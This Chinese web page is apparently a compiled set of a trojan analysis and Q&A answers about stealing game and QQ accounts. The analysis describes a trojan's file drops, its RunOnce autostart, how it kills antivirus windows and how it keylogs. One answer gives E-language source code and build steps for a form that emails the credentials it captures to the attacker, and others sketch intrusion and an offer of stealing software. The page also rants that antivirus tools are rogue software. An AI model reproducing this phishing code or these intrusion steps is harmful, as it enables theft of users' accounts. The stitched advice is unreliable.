病毒分析报告:
这是一个盗取“魔域”、“完美世界”和“浩方游戏平台”帐号为目的的木马,它用特殊的方法逃避杀毒软件的查杀,可能是病毒作者制作程序的BUG导致系统重启时,无法正常显示桌面。
1:拷贝文件
病毒运行后,会把自己拷贝到系统目录中
C:\WINDOWS\system32\wsttrs.exe
并释放一个病毒文件
C:\WINDOWS\system32\wsttrs.dll (Win32.Troj.Onlinegames.nb.12288)
之后病毒体会自删除
2:添加启动项
病毒会在注册表中添加一启动项,使自己随Windows启动
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
"wsttrs" = "C:\WINDOWS\wsttrs.exe"
可能是木马作者的疏忽,正是这个下次开机自动加载的程序导致系统不能正常显示桌面。
3:关闭杀毒软件
病毒会寻找杀毒软件的窗口,并关闭该窗口。如果发现杀毒软件主程序被关闭,正是病毒入侵的信号。
4:盗取帐号
病毒会寻找网络游戏"魔域"的游戏进程,并使用钩子读取用户输入的游戏帐号与信息,并把得到的信息通过wsttrs.dll文件以网站上传的方式发送到木马种植者事先指定的网站上去,使用户的游戏帐号丢失。
杀毒软件就是垃圾软件360更是流氓软件之王
盗号程序一般是用DELPHI编写的,高手也有用C或C++
原理简单的说就是骇客通过各种途径让你的电脑下载木马(网页挂马,主动入侵,社会工程等)
并在后台运行他,然后当你运行游戏的时候,木马会侦测到你已经开启了登陆窗口,就会进行键盘记录
当你点登陆后,密码就发送到骇客的邮箱或者网站上了..这是一般的盗号程序的原理
想防止的话,到微软官方网站去下载补丁,不要相信360什么的流氓软件
这样被挂马和主动入侵的机会就会减小,关于社会工程入侵,你最好买一本关于心理的书籍翻翻~~~
问题一:盗号qq高手怎么盗号 给钱帮忙盗号
问题二:如何盗号 娜娜:被盗号有两种可能。一是你在网吧或其它公众场合玩游戏被别人看见你输的账号、密码了;还有就是你家的电脑被远程控制安装了木马程序了。幸运的是你只被盗40级的号(有装备或TB的话十来个小时就可以练一个滴^0^)。 防止游戏账号被盗的几点举措: 1.注册账号的时候按照官网的提示建立密码保护,这样即使别人盗了你的号改了密码你也可以修改回来; 2.o自己的电脑安装一个木马防火墙;
问题三:知道怎么盗号? 先发源码
.版本 2
.支持库 internet
.子程序 _按钮1_被单击
.局部变量 发送结果, 文本型
连接发信服务器 (“ *** tp.163”, 25, “邮箱账号”, “邮箱密码”, )
发送邮件 (“傻瓜送号来了”, “邮箱账号” + 编辑框1.内容 + #换行符 + “邮箱密码” + 编辑框2.内容 + #换行符, “你的邮箱”, , , “你的邮箱”, )
图文教程
(1)
(2)
(3)
(4)
双击启动窗口
(5)
复制上方源码
(6)
(7)
(8)
调试成功后,编译
问题四:盗号的人是怎么盗号的 他们可以发木马什么的,如果你有去过网吧上网就更有可能,在网吧上网很危险的很容易号就会被盗,网吧很容易泄漏信息的,大部分这种情况都跟网吧有关系,或者你在别人那上,列如他家电脑,他手机等等,没弄好就正好给人家好奇心满足,他就上了,趁现在密码还没换你快去换密码,密保,绑定密保手机,记住不是绑定手机,这两个是有区别的,别弄错了,如果换了你就去申诉,申诉回来就按我说的那样做就可以了
问题五:怎么QQ盗号 利用代码侵入你想要盗号的设备,最好是电脑,因为电脑的ip地址比较容易定位。侵入系统后,将代码写进C盘,获取权限,开机自启动。就可以将其电脑里面的一个用户文件,发送至指定位置,有了这个用户文件,你就可以破译它的密码了。
问题六:怎么盗号 楼主,这可不是什么好事,玩家辛辛苦苦练的号被盗了。。。换位思考下
问题七:电脑里怎么盗号 我有盗号软件,电脑版的手机版的,还有网页版的
问题八:怎样盗号别人qq密码 QQ号码密码忘记了,如果QQ号码未设置密保或密保无法通过成功验证,可申诉找回,申诉注意事项:
1、多邀请QQ好友辅助申诉,并通知他们在3小时内完成辅助申诉(好友即使已被删除也可以邀请);
2、最好在最常使用QQ的地方(例如:家里、学校或最常去的网吧)提交帐号申诉表;
3、填写用过的QQ密码时,如果不记得完整的QQ密码,可以填写认为最接近的或只填写记得的部分密码。
问题九:电脑如何盗号 一般所谓的盗号就是发送一个键盘记录器给你。至于防范的手段就说一个吧。用鼠标点击上下。别一次性输入完。这样他就没办法记录了。
比如,你在帐号输入一两个。然后点下来(鼠标点。别用TAB键)密码在输入一两个。就这样切换着把帐号密码输入完。
当然,现在的木马什么的都很变态。我一朋友玩大话西游。有将军令。竟然都被人上了号。他都疯 了。
至于QQ号。我在别的论坛看的,可以给你点提示也可以说给你一些防范。一般电脑如果中了木马的话。 鼠标放在密码栏点右键。会出现 粘贴。 从右往左顺序等字样。如果点鼠标右键没反映。表示正常。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)